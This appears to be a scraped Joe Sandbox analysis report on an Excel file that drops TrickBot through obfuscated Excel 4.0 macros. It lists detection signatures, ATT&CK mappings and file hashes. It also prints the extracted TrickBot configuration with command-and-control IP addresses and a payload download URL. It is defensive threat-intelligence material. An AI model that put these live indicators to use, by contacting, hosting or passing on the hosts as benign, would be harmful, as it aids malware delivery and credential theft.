Play interactive tourEdit tour
Analysis Report 446446.xls
Overview
General Information
Detection
Hidden Macro 4.0 TrickBot
Score: | 96 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Office process drops PE file
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match
Classification
Startup |
---|
|
Malware Configuration |
---|
Threatname: Trickbot |
---|
{"ver": "2000028", "gtag": "rob52", "servs": ["89.250.208.42:449", "182.253.184.130:449", "31.211.85.110:443", "85.112.74.178:449", "102.68.17.97:443", "103.76.150.14:443", "96.9.77.142:443", "91.185.236.170:449", "87.76.1.81:449", "91.225.231.120:443", "62.213.14.166:443", "201.114.152.181:60304", "91.248.207.239:13871", "5.50.104.227:23468", "122.117.176.99:50289", "250.16.62.7:12037", "43.219.127.177:42389", "183.210.9.161:55813", "203.2.134.219:34188", "24.203.49.183:64402", "89.227.14.153:60566", "44.55.149.111:41730", "197.181.162.30:5798", "152.49.214.109:59125", "245.241.127.55:36657", "107.85.198.194:37398", "191.250.160.220:23460", "40.81.224.235:45065", "211.246.214.27:8638"], "autorun": ["pwgrab"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
Yara Overview |
---|
Initial Sample |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_EnableContent_String_Gen | Detects suspicious string that asks to enable active content in Office Doc | Florian Roth |
|
Memory Dumps |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Unpacked PEs |
---|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security | ||
JoeSecurity_TrickBot_4 | Yara detected Trickbot | Joe Security |
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Show All Signature Results
AV Detection: |
---|
Found malware configuration | Show sources |
Source: | Malware Configuration Extractor: |
Source: | File opened: |
Software Vulnerabilities: |
---|
Document exploit detected (drops PE files) | Show sources |
Source: | File created: | Jump to dropped file |
Document exploit detected (UrlDownloadToFile) | Show sources |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) | Show sources |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | HTTP traffic detected: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) | Show sources |
Source: | Screenshot OCR: | ||
Source: | Screenshot OCR: |
Found Excel 4.0 Macro with suspicious formulas | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Found obfuscated Excel 4.0 Macro | Show sources |
Source: | Initial sample: | ||
Source: | Initial sample: |
Office process drops PE file | Show sources |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | OLE indicator, VBA macros: |
Source: | Dropped File: | ||
Source: | Dropped File: |
Source: | Matched rule: |
Source: | Classification label: |
Source: | File created: | Jump to behavior |
Source: | File created: | Jump to behavior |
Source: | OLE indicator, Workbook stream: |
Source: | File read: | Jump to behavior |
Source: | Key opened: |
Source: | Process created: |
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: | ||
Source: | Process created: |
Source: | Window detected: |
Source: | Key opened: |
Source: | File opened: |
Source: | Code function: | ||
Source: | Code function: |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file |
Source: | File created: | Jump to dropped file | ||
Source: | File created: | Jump to dropped file |
Boot Survival: |
---|
Drops PE files to the user root directory | Show sources |
Source: | File created: | Jump to dropped file |
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: | ||
Source: | Process information set: |
Source: | Dropped PE file which has not been started: | Jump to dropped file |
Source: | Process created: |
Stealing of Sensitive Information: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Remote Access Functionality: |
---|
Yara detected Trickbot | Show sources |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting21 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Non-Application Layer Protocol2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution33 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Rundll321 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Ingress Tool Transfer1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection11 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting21 | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
Source | Detection | Scanner | Label | Link | Download |
---|---|---|---|---|---|
100% | Avira | HEUR/AGEN.1138157 | Download File |
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Virustotal | Browse | ||
0% | Virustotal | Browse |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Virustotal | Browse | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | Avira URL Cloud | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe | ||
0% | URL Reputation | safe |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
living-traditions.com | 64.207.186.30 | true | false |
| unknown |
clientconfig.passport.net | unknown | unknown | true |
| unknown |
Contacted URLs |
---|
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
false |
| unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high | |||
false |
| unknown | ||
false | high |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
64.207.186.30 | living-traditions.com | United States | 398110 | GO-DADDY-COM-LLCUS | false |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 385552 |
Start date: | 12.04.2021 |
Start time: | 17:11:27 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 10s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Sample file name: | 446446.xls |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Run name: | Potential for more IOCs and behavior |
Number of analysed new started processes analysed: | 30 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal96.troj.expl.evad.winXLS@5/8@2/1 |
EGA Information: |
|
HDC Information: |
|
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
Time | Type | Description |
---|---|---|
17:12:30 | API Interceptor |
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
64.207.186.30 | Get hash | malicious | Browse |
|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
GO-DADDY-COM-LLCUS | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
No context |
---|
Dropped Files |
---|
Created / dropped Files |
---|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 133926 |
Entropy (8bit): | 5.3703247507002985 |
Encrypted: | false |
SSDEEP: | 1536:/cQIKNEHBXA3gBwqpQ9DQW+zjM34ZldEKWGlOhIQX5ErLWME9:EVQ9DQW+zYXO8 |
MD5: | 9559FA6EB738D9BC9BC6833652EB4E4D |
SHA1: | 76522723B61DE9679B0D276B600E7A8860267B01 |
SHA-256: | 32E6DB996EAC4915BA6F963A9406C5B611BBBF295F24C516F99E6EC1FC0316D1 |
SHA-512: | 1A5ADED8BA8EE3C2783C3FEB993A3F306C5B7531F912F9A94DDBF9BF2FC7C11C670B2237694CFE0B2A1DB3F4F227FB5EFE21D00E66A7F2186F3FC51B4F43C626 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
IE Cache URL: | http://living-traditions.com/blogs/click.php |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 80472 |
Entropy (8bit): | 7.887674613462612 |
Encrypted: | false |
SSDEEP: | 1536:clJGmOQRbgrWGHKT7AeWRlMVGoIahaDHTU6hryF70KiQ:cbGmOQRbgrW2KT7g2sTU2yF70KiQ |
MD5: | 3806F1BA0C68ABABDAAD11C09F7E7C84 |
SHA1: | 2B1B86584B11EE9407A39D88B5044E403D7ACDEF |
SHA-256: | D65513C26BDE3DD4AE8DA9A7C16BE2540FD551D6D6674EEE7E0D9792881F99A1 |
SHA-512: | 88ADF638FD18E386F539610589BD0AD96F247A149B93CC589DCE8A3BB0B79D2BA2BC737EC297E1613FA95A0A902EAB55AAB3D628FFDF7E0084D4246677E7966F |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2066 |
Entropy (8bit): | 4.651416909086472 |
Encrypted: | false |
SSDEEP: | 24:8/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6my/dDWt4UxwQYA4Sbo0AaX7DMHF7aB6m:8/YmvxS8Da8HIB6p/YmvxS8Da8HIB6 |
MD5: | 5AB3706D085881A1D4836C30CB8212C4 |
SHA1: | C6B634036314EA7D9308E7B10DE84E370DA37B9E |
SHA-256: | EC254D08DEA693D4456B6DFA2E215A7C2F8798202D09A7CC81924AD883629625 |
SHA-512: | 2C7E15C1EF6CFB4D129779ED69BF95F7B3FE735BF3F734276470B2097C2AFA1FCFC6CCEE0354DCA54BB77719710599715E110BEF4BEFF2E504F6AFE514CD7338 |
Malicious: | true |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 904 |
Entropy (8bit): | 4.643076575571524 |
Encrypted: | false |
SSDEEP: | 12:8iRcXUV3tHuElPCH2JgUxw7GhOX+WrjAZ/2bD03DLC5Lu4t2Y+xIBjKZm:8iRbt4Uxw6uAZiDMq87aB6m |
MD5: | EF3F360D18E0AF8661AFEACCC90C95B9 |
SHA1: | C8A408AFD5B1C569A55884F34482716D9E4E5E8A |
SHA-256: | 425B362E827F53278F7D587E1EC47AFEB3B3DA2BDBDF9E440B3B696583418954 |
SHA-512: | 32EE8CA8843B2E7F5B5B79680B6856A3C417484EEC79E192BB2EA131FA0DD99A67EF24173F02040115D1D4B136D27A2CF080DE19AED4C18D7C28EF3FEC9F6333 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 83 |
Entropy (8bit): | 4.062636835813932 |
Encrypted: | false |
SSDEEP: | 3:oyBVomMJRT3Ip273Ip2mMJRT3Ip2v:dj6J14LmJ142 |
MD5: | 546FBC897E0253FD4115B55013DB9EC5 |
SHA1: | 01C5E19E8AD4B7DB773765B0522E2524926CBE8E |
SHA-256: | 77F95B49BFF9A69DEC8FC0B77F48EBF54111EB7F4BDAD317A51C9A019FE250BF |
SHA-512: | 088C09B290FF9AA6E5D2BC373D19EFA034D2DF07B52A12F6B69B8B47FEA74ED6F4BD3EDDAF4B0E294E3556D752588AC7CC5B6F18B72FA391AB6091E07006D689 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 161733 |
Entropy (8bit): | 6.925925053233649 |
Encrypted: | false |
SSDEEP: | 3072:V78rmOAIyyzElBIL6lECbgBGzP5xLm7TK2jTUqyF70virW2akHGaakHh5o78rmOQ:p8rmOAIyyzElBIL6lECbgB+P5Nm7T5UW |
MD5: | 8F620D3AB90FC12134D008C890041FDA |
SHA1: | 07FFAE23C88B756A4FA3D0C8903B996EE05A1620 |
SHA-256: | D48665C8B028E9328061DF6988465D7F5B576EE3ED3B3214EE4138CC5E3119D9 |
SHA-512: | E3430608D5E3546AB186E9C42E48B2E49245AE79750F73A39CB81F1BC005B33F6F935A6874BA099079C02360B1494C98B1765A76875D42C5876ED6EB03A36C09 |
Malicious: | false |
Reputation: | low |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | modified |
Size (bytes): | 449536 |
Entropy (8bit): | 5.5101637778448955 |
Encrypted: | false |
SSDEEP: | 6144:BqeyCMxv21VX5rHrP9HlIjlYVnvi5TnMTBs7xTUgzFxmSZ81gVRHZOXTulpwNF6c:Bq9CAvi3LlHXtiyTBITzwTCAa6dx |
MD5: | CBEA511BD35F247E4B4BF7CC5A3A7CBD |
SHA1: | 8C0D352934271350CFE6C00B7587E8DC8D062817 |
SHA-256: | 0AE86E5ABBC09E96F8C1155556CA6598C22AEBD73ACBBA8D59F2CE702D3115F8 |
SHA-512: | AEC894D9D3AACCCCC029C615D283AF4946C5150372DB0ECDD616A9D491478759068214BF03DB11631A5EFB59951150D92C1517C2C11D8C6F0DDF5C8F76734FCF |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 3.2150745788685295 |
TrID: |
|
File name: | 446446.xls |
File size: | 283136 |
MD5: | 1b62b4f4b16d6219dce4c6d145c5af79 |
SHA1: | d5bc46f3043119c020ae93121195aabbf151cf75 |
SHA256: | dd3ecdcc3a6cc81ee451f90703cc899ff43c7a05b30a6538e5f3afd73f77adb1 |
SHA512: | 1a774ebb111463491f16a88b465e959c14ba32b6a399f108abe43fef66e61b663840998efdcd504306f3b28dd052032b82e8e642ffc9f9ed05186aaedbaf420e |
